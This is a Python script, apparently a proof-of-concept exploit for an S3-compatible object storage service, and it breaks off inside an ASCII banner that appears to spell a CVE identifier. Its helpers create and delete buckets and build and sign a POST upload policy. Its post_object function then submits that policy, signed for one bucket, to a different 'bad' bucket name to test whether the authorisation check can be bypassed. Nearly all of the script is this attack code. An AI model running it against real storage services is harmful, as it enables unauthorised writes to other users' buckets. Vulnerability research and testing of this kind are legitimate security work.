import base64 import datetime import hashlib import hmac import json import uuid import boto3 import pytz import requests from botocore.client import Config def connect(access_key, secret_key, endpoint, is_secure, ssl_verify): return boto3.client(service_name='s3', aws_access_key_id=access_key, aws_secret_access_key=secret_key, endpoint_url=endpoint, use_ssl=is_secure, verify=ssl_verify, config=Config(signature_version='s3v4')) def create_bucket(connection, bucket_name): bucket_name = bucket_name[0:10] print("[I] Creating bucket: {}".format(bucket_name)) bucket_creating = connection.create_bucket(Bucket=bucket_name) if bucket_creating['ResponseMetadata']['HTTPStatusCode'] == 200: return bucket_name print("[E] Bucket creation failed!") print(bucket_creating) def delete_bucket(connection, bucket_name): response = connection.list_objects_v2( Bucket=bucket_name, ) while response['KeyCount'] > 0: response = connection.delete_objects( Bucket=bucket_name, Delete={ 'Objects': [{'Key': obj['Key']} for obj in response['Contents']] } ) response = connection.list_objects_v2( Bucket=bucket_name, ) response = connection.delete_bucket( Bucket=bucket_name ) if response['ResponseMetadata']['HTTPStatusCode'] == 204: print("[I] Bucket deleted successfully! {}".format(bucket_name)) return print("[E] Bucket deletion failed!") print(response) def generate_policy(bucket_name): expires = datetime.datetime.now(pytz.utc) + datetime.timedelta(seconds=+6000) policy_document = { "expiration": expires.strftime("%Y-%m-%dT%H:%M:%SZ"), "conditions": [ {"bucket": bucket_name}, ["starts-with", "$key", "foo"], {"acl": "private"}, ["starts-with", "$Content-Type", "text/plain"], ["content-length-range", 0, 1024] ] } return base64.b64encode(bytes(json.JSONEncoder().encode(policy_document), 'utf-8')) def sign_policy(policy, secret_key): return base64.b64encode( hmac.new(bytes(secret_key, 'utf-8'), policy, hashlib.sha1).digest()) def post_object(endpoint, bucket_name, bad_bucket_name, policy, access_key, signature, ssl): payload = { "key": "${filename}", 'bucket': bucket_name, "AWSAccessKeyId": access_key, "signature": signature, "acl": "private", "policy": policy, "Content-Type": "text/plain", 'file': ('foo.txt', 'bar') } return requests.post("{}/{}".format(endpoint, bad_bucket_name), files=payload, verify=ssl) if __name__ == '__main__': print( " ______ ______ ___ ___ ___ ____ ____ ____ ___ ____ ___ \n / ___/ | / / __/___|_ |/ _ \|_ ||_ /___/ / /|_ // _ \/ / // _ \ \n/ /__ | |/ / _//___/ __// // / __/_/_ <___/_ _//_